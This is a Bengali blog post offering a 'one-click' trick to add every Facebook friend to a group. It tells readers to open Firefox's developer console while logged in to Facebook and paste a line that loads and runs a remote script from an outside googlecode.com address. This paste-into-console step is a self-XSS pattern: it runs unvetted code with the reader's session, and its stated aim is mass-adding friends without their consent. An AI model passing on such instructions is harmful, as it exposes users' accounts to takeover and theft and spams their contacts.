একটি মাত্র ক্লিক এ আপনার সকল বন্ধু কে আপানার facebook গ্রুপএ অ্যাড করুন

গ্রুপ এ সদস্য বাড়ানো একটু সময় সাপেক্ষ ব্যাপার। একজন একজন করে বন্ধু অ্যাড করাও অনেক বিরক্তিকর কাজ। এই বিরক্তি কমানোর জন্য আজ আমি নিয়ে এলাম একটি ট্রিক্স। যার মাধ্যমে খুব সহজে অল্প সময়ে আপনার বন্ধু তালিকার সবাই কে অ্যাড করতে পারবেন...
আসুন শুরু করা যাক... নিচের স্টেপ গুলো মনোযোগ দিয়ে ফলো করুন... ১: আপনার firefox ব্রাউজার ওপেন করুন। ২: facebook এ লগইন করুন। আপনার কাঙ্খিত গ্রুপ এ প্রবেশ করুন। ৩: এবার Ctrl + Shift + K চাপুন। একটি window আসবে। নিচের কোড টি কপি করে পেস্ট করুন। document.body.appendChild(document.createElement('script')).src='http://group-invites.googlecode.com/files/group-invite.js'; ৪: এবার Enter চাপুন। ৫: এবার Ctrl + Shift + K আবার চাপুন। আপনার কাজ শেষ। দেখবেন অ্যাড হচ্ছে। ****সতর্কতাঃ সব ফ্রেন্ড অ্যাড হওয়ার আগে লগ আউট করবেন না।

Comments

Post a Comment

Popular posts from this blog

উদ্যোক্তাদের জন্য ৫টি উপদেশ ৫টি প্রতিষ্টান প্রধানের পক্ষ থেকে

স্মার্টফোনের অতি ব্যবহার কিশোরদের অমনোযোগী করে

সবার চোখের আড়াল হতে আপনার ফেসবুক একাউন্ট হাইড করুন